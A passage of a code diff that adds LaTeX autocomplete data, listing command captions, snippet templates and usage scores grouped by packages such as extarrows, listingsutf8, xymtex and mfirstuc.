'\\over{}', + snippet: '\\over{$1}', + meta: 'extarrows-cmd', + score: 0.0054372322008878786, + }, + { + caption: '\\over', + snippet: '\\over', + meta: 'extarrows-cmd', + score: 0.0054372322008878786, + }, + { + caption: '\\bigotimes', + snippet: '\\bigotimes', + meta: 'extarrows-cmd', + score: 0.000984722260624791, + }, + { + caption: '\\bigoplus', + snippet: '\\bigoplus', + meta: 'extarrows-cmd', + score: 0.0011508785476242003, + }, + { + caption: '\\theequation', + snippet: '\\theequation', + meta: 'extarrows-cmd', + score: 0.002995924112493351, + }, + { + caption: '\\bigcap', + snippet: '\\bigcap', + meta: 'extarrows-cmd', + score: 0.005709261168797874, + }, + { + caption: '\\xrightarrow{}', + snippet: '\\xrightarrow{$1}', + meta: 'extarrows-cmd', + score: 0.004163642482777231, + }, + { + caption: '\\xrightarrow[]{}', + snippet: '\\xrightarrow[$1]{$2}', + meta: 'extarrows-cmd', + score: 0.004163642482777231, + }, + { + caption: '\\atop', + snippet: '\\atop', + meta: 'extarrows-cmd', + score: 0.0006518541515279979, + }, + { + caption: '\\dfrac{}{}', + snippet: '\\dfrac{$1}{$2}', + meta: 'extarrows-cmd', + score: 0.05397545277891961, + }, + { + caption: '\\pmod', + snippet: '\\pmod', + meta: 'extarrows-cmd', + score: 0.0011773327219377148, + }, + { + caption: '\\pmod{}', + snippet: '\\pmod{$1}', + meta: 'extarrows-cmd', + score: 0.0011773327219377148, + }, + { + caption: '\\notag', + snippet: '\\notag', + meta: 'extarrows-cmd', + score: 0.00322520920930312, + }, + { + caption: '\\int', + snippet: '\\int', + meta: 'extarrows-cmd', + score: 0.11946660537765894, + }, + { + caption: '\\Vec{}', + snippet: '\\Vec{$1}', + meta: 'extarrows-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\bigvee', + snippet: '\\bigvee', + meta: 'extarrows-cmd', + score: 0.0011677288242806726, + }, + { + caption: '\\sum', + snippet: '\\sum', + meta: 'extarrows-cmd', + score: 0.42607994509619934, + }, + { + caption: '\\hookrightarrow', + snippet: '\\hookrightarrow', + meta: 'extarrows-cmd', + score: 0.0015607282046545064, + }, + { + caption: '\\bigsqcup', + snippet: '\\bigsqcup', + meta: 'extarrows-cmd', + score: 0.0003468284144579442, + }, + { + caption: '\\hookleftarrow', + snippet: '\\hookleftarrow', + meta: 'extarrows-cmd', + score: 0.0016498799924012809, + }, + { + caption: '\\Dot{}', + snippet: '\\Dot{$1}', + meta: 'extarrows-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\dots', + snippet: '\\dots', + meta: 'extarrows-cmd', + score: 0.0847414497955395, + }, + { + caption: '\\genfrac{}{}{}{}{}{}', + snippet: '\\genfrac{$1}{$2}{$3}{$4}{$5}{$6}', + meta: 'extarrows-cmd', + score: 0.004820143328295316, + }, + { + caption: '\\genfrac', + snippet: '\\genfrac', + meta: 'extarrows-cmd', + score: 0.004820143328295316, + }, + { + caption: '\\cfrac{}{}', + snippet: '\\cfrac{$1}{$2}', + meta: 'extarrows-cmd', + score: 0.006765684097139381, + }, + { + caption: '\\Acute{}', + snippet: '\\Acute{$1}', + meta: 'extarrows-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\ldots', + snippet: '\\ldots', + meta: 'extarrows-cmd', + score: 0.11585556755884258, + }, + { + caption: '\\coprod', + snippet: '\\coprod', + meta: 'extarrows-cmd', + score: 0.00011383372700282614, + }, + { + caption: '\\impliedby', + snippet: '\\impliedby', + meta: 'extarrows-cmd', + score: 2.3482915591834053e-5, + }, + { + caption: '\\big', + snippet: '\\big', + meta: 'extarrows-cmd', + score: 0.05613164277964739, + }, + { + caption: '\\idotsint', + snippet: '\\idotsint', + meta: 'extarrows-cmd', + score: 1.3908704929884828e-5, + }, + { + caption: '\\Longrightarrow', + snippet: '\\Longrightarrow', + meta: 'extarrows-cmd', + score: 0.002459139437356601, + }, + { + caption: '\\allowdisplaybreaks', + snippet: '\\allowdisplaybreaks', + meta: 'extarrows-cmd', + score: 0.005931777024772073, + }, + { + caption: '\\eqref{}', + snippet: '\\eqref{$1}', + meta: 'extarrows-cmd', + score: 0.06345266254167037, + }, + { + caption: '\\mod', + snippet: '\\mod', + meta: 'extarrows-cmd', + score: 0.0015181439193121889, + }, + { + caption: '\\mod{}', + snippet: '\\mod{$1}', + meta: 'extarrows-cmd', + score: 0.0015181439193121889, + }, + { + caption: '\\arraystretch', + snippet: '\\arraystretch', + meta: 'extarrows-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\arraystretch{}', + snippet: '\\arraystretch{$1}', + meta: 'extarrows-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\bigg', + snippet: '\\bigg', + meta: 'extarrows-cmd', + score: 0.04318078602869565, + }, + { + caption: '\\underset{}{}', + snippet: '\\underset{$1}{$2}', + meta: 'extarrows-cmd', + score: 0.012799893214578391, + }, + { + caption: '\\dotsc', + snippet: '\\dotsc', + meta: 'extarrows-cmd', + score: 0.0008555101484119994, + }, + { + caption: '\\doteq', + snippet: '\\doteq', + meta: 'extarrows-cmd', + score: 3.164631070474435e-5, + }, + { + caption: '\\leftroot{}', + snippet: '\\leftroot{$1}', + meta: 'extarrows-cmd', + score: 6.625561928497235e-5, + }, + { + caption: '\\substack{}', + snippet: '\\substack{$1}', + meta: 'extarrows-cmd', + score: 0.0037482529712850755, + }, + { + caption: '\\Hat{}', + snippet: '\\Hat{$1}', + meta: 'extarrows-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\frac{}{}', + snippet: '\\frac{$1}{$2}', + meta: 'extarrows-cmd', + score: 1.4341091141105058, + }, + { + caption: '\\mspace{}', + snippet: '\\mspace{$1}', + meta: 'extarrows-cmd', + score: 3.423236656565836e-5, + }, + { + caption: '\\Bar{}', + snippet: '\\Bar{$1}', + meta: 'extarrows-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\Grave{}', + snippet: '\\Grave{$1}', + meta: 'extarrows-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\implies', + snippet: '\\implies', + meta: 'extarrows-cmd', + score: 0.021828316911576096, + }, + { + caption: '\\tbinom', + snippet: '\\tbinom', + meta: 'extarrows-cmd', + score: 1.3908704929884828e-5, + }, + { + caption: '\\dotsi', + snippet: '\\dotsi', + meta: 'extarrows-cmd', + score: 2.7817409859769657e-5, + }, + { + caption: '\\bigwedge', + snippet: '\\bigwedge', + meta: 'extarrows-cmd', + score: 0.000347742918592393, + }, + { + caption: '\\sideset{}{}', + snippet: '\\sideset{$1}{$2}', + meta: 'extarrows-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\smash{}', + snippet: '\\smash{$1}', + meta: 'extarrows-cmd', + score: 0.008197171096663127, + }, + { + caption: '\\smash[]{}', + snippet: '\\smash[$1]{$2}', + meta: 'extarrows-cmd', + score: 0.008197171096663127, + }, + { + caption: '\\colon', + snippet: '\\colon', + meta: 'extarrows-cmd', + score: 0.005300291684408929, + }, + { + caption: '\\intertext{}', + snippet: '\\intertext{$1}', + meta: 'extarrows-cmd', + score: 0.0016148076375871775, + }, + { + caption: '\\Longleftarrow', + snippet: '\\Longleftarrow', + meta: 'extarrows-cmd', + score: 8.477207854183949e-5, + }, + { + caption: '\\prod', + snippet: '\\prod', + meta: 'extarrows-cmd', + score: 0.02549889375975901, + }, + { + caption: '\\AmS', + snippet: '\\AmS', + meta: 'extarrows-cmd', + score: 0.00047859486202980376, + }, + { + caption: '\\overline{}', + snippet: '\\overline{$1}', + meta: 'extarrows-cmd', + score: 0.11280487530505384, + }, + { + caption: '\\tfrac{}{}', + snippet: '\\tfrac{$1}{$2}', + meta: 'extarrows-cmd', + score: 0.0005923542426657187, + }, + { + caption: '\\uproot{}', + snippet: '\\uproot{$1}', + meta: 'extarrows-cmd', + score: 6.625561928497235e-5, + }, + { + caption: '\\bmod', + snippet: '\\bmod', + meta: 'extarrows-cmd', + score: 0.002022594681005002, + }, + { + caption: '\\bmod{}', + snippet: '\\bmod{$1}', + meta: 'extarrows-cmd', + score: 0.002022594681005002, + }, + { + caption: '\\pod{}', + snippet: '\\pod{$1}', + meta: 'extarrows-cmd', + score: 2.7817409859769657e-5, + }, + { + caption: '\\label{}', + snippet: '\\label{$1}', + meta: 'extarrows-cmd', + score: 1.897791904799601, + }, + { + caption: '\\longrightarrow', + snippet: '\\longrightarrow', + meta: 'extarrows-cmd', + score: 0.013399422292458848, + }, + { + caption: '\\xleftarrow[]{}', + snippet: '\\xleftarrow[$1]{$2}', + meta: 'extarrows-cmd', + score: 3.5779964196240445e-5, + }, + { + caption: '\\xleftarrow{}', + snippet: '\\xleftarrow{$1}', + meta: 'extarrows-cmd', + score: 3.5779964196240445e-5, + }, + { + caption: '\\mathaccentV', + snippet: '\\mathaccentV', + meta: 'extarrows-cmd', + score: 6.216218551413489e-5, + }, + { + caption: '\\hdotsfor{}', + snippet: '\\hdotsfor{$1}', + meta: 'extarrows-cmd', + score: 0.00024247684499275043, + }, + { + caption: '\\hdotsfor[]{}', + snippet: '\\hdotsfor[$1]{$2}', + meta: 'extarrows-cmd', + score: 0.00024247684499275043, + }, + { + caption: '\\Bigg', + snippet: '\\Bigg', + meta: 'extarrows-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\Bigg[]', + snippet: '\\Bigg[$1]', + meta: 'extarrows-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\overset{}{}', + snippet: '\\overset{$1}{$2}', + meta: 'extarrows-cmd', + score: 0.007611544955294224, + }, + { + caption: '\\Big', + snippet: '\\Big', + meta: 'extarrows-cmd', + score: 0.050370758781422345, + }, + { + caption: '\\longleftrightarrow', + snippet: '\\longleftrightarrow', + meta: 'extarrows-cmd', + score: 0.0002851769278703356, + }, + { + caption: '\\Longleftrightarrow', + snippet: '\\Longleftrightarrow', + meta: 'extarrows-cmd', + score: 0.0004896780659212191, + }, + { + caption: '\\Longleftrightarrow{}', + snippet: '\\Longleftrightarrow{$1}', + meta: 'extarrows-cmd', + score: 0.0004896780659212191, + }, + { + caption: '\\binom{}{}', + snippet: '\\binom{$1}{$2}', + meta: 'extarrows-cmd', + score: 0.013010882180364367, + }, + { + caption: '\\longleftarrow', + snippet: '\\longleftarrow', + meta: 'extarrows-cmd', + score: 0.0011096532692473691, + }, + { + caption: '\\dbinom{}{}', + snippet: '\\dbinom{$1}{$2}', + meta: 'extarrows-cmd', + score: 0.006800272303210672, + }, + { + caption: '\\Tilde{}', + snippet: '\\Tilde{$1}', + meta: 'extarrows-cmd', + score: 7.874446783586035e-5, + }, + { + caption: '\\bigcup', + snippet: '\\bigcup', + meta: 'extarrows-cmd', + score: 0.0058847868741168765, + }, + { + caption: '\\sinh', + snippet: '\\sinh', + meta: 'extarrows-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\sinh{}', + snippet: '\\sinh{$1}', + meta: 'extarrows-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\operatorname{}', + snippet: '\\operatorname{$1}', + meta: 'extarrows-cmd', + score: 0.02181954887028883, + }, + { + caption: '\\max', + snippet: '\\max', + meta: 'extarrows-cmd', + score: 0.04116833357968482, + }, + { + caption: '\\liminf', + snippet: '\\liminf', + meta: 'extarrows-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\liminf{}', + snippet: '\\liminf{$1}', + meta: 'extarrows-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\operatornamewithlimits{}', + snippet: '\\operatornamewithlimits{$1}', + meta: 'extarrows-cmd', + score: 0.0022415507993352067, + }, + { + caption: '\\exp', + snippet: '\\exp', + meta: 'extarrows-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\exp{}', + snippet: '\\exp{$1}', + meta: 'extarrows-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\lim', + snippet: '\\lim', + meta: 'extarrows-cmd', + score: 0.05285123457928509, + }, + { + caption: '\\sin', + snippet: '\\sin', + meta: 'extarrows-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\sin{}', + snippet: '\\sin{$1}', + meta: 'extarrows-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\arg', + snippet: '\\arg', + meta: 'extarrows-cmd', + score: 0.007190995792600074, + }, + { + caption: '\\cos', + snippet: '\\cos', + meta: 'extarrows-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\cos{}', + snippet: '\\cos{$1}', + meta: 'extarrows-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\varliminf', + snippet: '\\varliminf', + meta: 'extarrows-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\hom', + snippet: '\\hom', + meta: 'extarrows-cmd', + score: 8.180643329881783e-5, + }, + { + caption: '\\tan', + snippet: '\\tan', + meta: 'extarrows-cmd', + score: 0.006176447465423192, + }, + { + caption: '\\det', + snippet: '\\det', + meta: 'extarrows-cmd', + score: 0.005640718203101287, + }, + { + caption: '\\ln', + snippet: '\\ln', + meta: 'extarrows-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\ln{}', + snippet: '\\ln{$1}', + meta: 'extarrows-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\cosh', + snippet: '\\cosh', + meta: 'extarrows-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\cosh{}', + snippet: '\\cosh{$1}', + meta: 'extarrows-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\gcd', + snippet: '\\gcd', + meta: 'extarrows-cmd', + score: 0.002254008371792865, + }, + { + caption: '\\limsup', + snippet: '\\limsup', + meta: 'extarrows-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\limsup{}', + snippet: '\\limsup{$1}', + meta: 'extarrows-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\inf', + snippet: '\\inf', + meta: 'extarrows-cmd', + score: 0.00340470256994063, + }, + { + caption: '\\arccos', + snippet: '\\arccos', + meta: 'extarrows-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\arccos{}', + snippet: '\\arccos{$1}', + meta: 'extarrows-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\ker', + snippet: '\\ker', + meta: 'extarrows-cmd', + score: 0.002475379242338094, + }, + { + caption: '\\cot', + snippet: '\\cot', + meta: 'extarrows-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\cot{}', + snippet: '\\cot{$1}', + meta: 'extarrows-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\coth{}', + snippet: '\\coth{$1}', + meta: 'extarrows-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\coth', + snippet: '\\coth', + meta: 'extarrows-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\varlimsup', + snippet: '\\varlimsup', + meta: 'extarrows-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\log', + snippet: '\\log', + meta: 'extarrows-cmd', + score: 0.048131780413380156, + }, + { + caption: '\\varinjlim', + snippet: '\\varinjlim', + meta: 'extarrows-cmd', + score: 0.000361814283649031, + }, + { + caption: '\\deg', + snippet: '\\deg', + meta: 'extarrows-cmd', + score: 0.005542465148816408, + }, + { + caption: '\\arctan', + snippet: '\\arctan', + meta: 'extarrows-cmd', + score: 0.0011971697553682045, + }, + { + caption: '\\dim', + snippet: '\\dim', + meta: 'extarrows-cmd', + score: 0.0038210003967178293, + }, + { + caption: '\\min', + snippet: '\\min', + meta: 'extarrows-cmd', + score: 0.03051120054363316, + }, + { + caption: '\\Pr', + snippet: '\\Pr', + meta: 'extarrows-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\Pr[]', + snippet: '\\Pr[$1]', + meta: 'extarrows-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\tanh', + snippet: '\\tanh', + meta: 'extarrows-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\tanh{}', + snippet: '\\tanh{$1}', + meta: 'extarrows-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\arcsin', + snippet: '\\arcsin', + meta: 'extarrows-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\arcsin{}', + snippet: '\\arcsin{$1}', + meta: 'extarrows-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\DeclareMathOperator{}{}', + snippet: '\\DeclareMathOperator{$1}{$2}', + meta: 'extarrows-cmd', + score: 0.029440493885398676, + }, + { + caption: '\\csc', + snippet: '\\csc', + meta: 'extarrows-cmd', + score: 0.00013963711107573638, + }, + { + caption: '\\sup', + snippet: '\\sup', + meta: 'extarrows-cmd', + score: 0.009355514755312534, + }, + { + caption: '\\sec', + snippet: '\\sec', + meta: 'extarrows-cmd', + score: 0.0005912636157903734, + }, + { + caption: '\\varprojlim', + snippet: '\\varprojlim', + meta: 'extarrows-cmd', + score: 0.0004286136584068833, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'extarrows-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'extarrows-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\text{}', + snippet: '\\text{$1}', + meta: 'extarrows-cmd', + score: 0.3608680734736821, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'extarrows-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'extarrows-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\frenchspacing', + snippet: '\\frenchspacing', + meta: 'extarrows-cmd', + score: 0.0063276692758974925, + }, + ], + listingsutf8: [ + { + caption: '\\vskip', + snippet: '\\vskip', + meta: 'listingsutf8-cmd', + score: 0.05143052892347224, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'listingsutf8-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'listingsutf8-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'listingsutf8-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\thelstlisting', + snippet: '\\thelstlisting', + meta: 'listingsutf8-cmd', + score: 0.00012774128088872144, + }, + { + caption: '\\lstinputlisting[]{}', + snippet: '\\lstinputlisting[$1]{$2}', + meta: 'listingsutf8-cmd', + score: 0.011660477607086044, + }, + { + caption: '\\lstinputlisting{}', + snippet: '\\lstinputlisting{$1}', + meta: 'listingsutf8-cmd', + score: 0.011660477607086044, + }, + { + caption: '\\space', + snippet: '\\space', + meta: 'listingsutf8-cmd', + score: 0.023010789853665694, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'listingsutf8-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\lstinline', + snippet: '\\lstinline', + meta: 'listingsutf8-cmd', + score: 0.005972262850694285, + }, + { + caption: '\\lstinline{}', + snippet: '\\lstinline{$1}', + meta: 'listingsutf8-cmd', + score: 0.005972262850694285, + }, + { + caption: '\\lstlistoflistings', + snippet: '\\lstlistoflistings', + meta: 'listingsutf8-cmd', + score: 0.005279080363360602, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'listingsutf8-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'listingsutf8-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'listingsutf8-cmd', + score: 0.00037306820619479756, + }, + ], + forloop: [ + { + caption: '\\forloop{}{}{}{}', + snippet: '\\forloop{$1}{$2}{$3}{$4}', + meta: 'forloop-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'forloop-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'forloop-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'forloop-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'forloop-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'forloop-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'forloop-cmd', + score: 0.0018957469739775527, + }, + ], + xymtex: [ + { + caption: '\\arraystretch', + snippet: '\\arraystretch', + meta: 'xymtex-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\arraystretch{}', + snippet: '\\arraystretch{$1}', + meta: 'xymtex-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\mathcal{}', + snippet: '\\mathcal{$1}', + meta: 'xymtex-cmd', + score: 0.35084018920966636, + }, + { + caption: '\\theequation', + snippet: '\\theequation', + meta: 'xymtex-cmd', + score: 0.002995924112493351, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'xymtex-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'xymtex-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'xymtex-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'xymtex-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'xymtex-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'xymtex-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'xymtex-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'xymtex-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'xymtex-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'xymtex-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'xymtex-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'xymtex-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'xymtex-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'xymtex-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'xymtex-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'xymtex-cmd', + score: 0.2864294797053033, + }, + ], + eqlist: [ + { + caption: '\\endtabular', + snippet: '\\endtabular', + meta: 'eqlist-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\multicolumn{}{}{}', + snippet: '\\multicolumn{$1}{$2}{$3}', + meta: 'eqlist-cmd', + score: 0.5473606021405326, + }, + { + caption: '\\array{}', + snippet: '\\array{$1}', + meta: 'eqlist-cmd', + score: 2.650484574842396e-5, + }, + { + caption: '\\arraybackslash', + snippet: '\\arraybackslash', + meta: 'eqlist-cmd', + score: 0.014532521139459619, + }, + { + caption: '\\tabular{}', + snippet: '\\tabular{$1}', + meta: 'eqlist-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'eqlist-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\newcolumntype{}[]{}', + snippet: '\\newcolumntype{$1}[$2]{$3}', + meta: 'eqlist-cmd', + score: 0.018615449342361392, + }, + { + caption: '\\newcolumntype{}{}', + snippet: '\\newcolumntype{$1}{$2}', + meta: 'eqlist-cmd', + score: 0.018615449342361392, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'eqlist-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'eqlist-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'eqlist-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\eqparbox{}{}', + snippet: '\\eqparbox{$1}{$2}', + meta: 'eqlist-cmd', + score: 2.9423534119530166e-5, + }, + { + caption: '\\item', + snippet: '\\item ', + meta: 'eqlist-cmd', + score: 3.800886892251021, + }, + { + caption: '\\item[]', + snippet: '\\item[$1] ', + meta: 'eqlist-cmd', + score: 3.800886892251021, + }, + ], + tgschola: [ + { + caption: '\\empty', + snippet: '\\empty', + meta: 'tgschola-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tgschola-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tgschola-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'tgschola-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tgschola-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tgschola-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tgschola-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'tgschola-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tgschola-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tgschola-cmd', + score: 0.021170869458413965, + }, + ], + mfirstuc: [ + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'mfirstuc-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'mfirstuc-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'mfirstuc-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'mfirstuc-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'mfirstuc-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'mfirstuc-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'mfirstuc-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'mfirstuc-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'mfirstuc-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'mfirstuc-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'mfirstuc-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'mfirstuc-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'mfirstuc-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'mfirstuc-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'mfirstuc-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'mfirstuc-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'mfirstuc-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'mfirstuc-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'mfirstuc-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'mfirstuc-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'mfirstuc-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'mfirstuc-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'mfirstuc-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'mfirstuc-cmd', + score: 0.008565354665444157, + }, + ], + gloss: [ + { + caption: '\\makegloss', + snippet: '\\makegloss', + meta: 'gloss-cmd', + score: 0.0018653410309739879, + }, + ], + ltxcmds: [ + { + caption: '\\csname', + snippet: '\\csname', + meta: 'ltxcmds-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 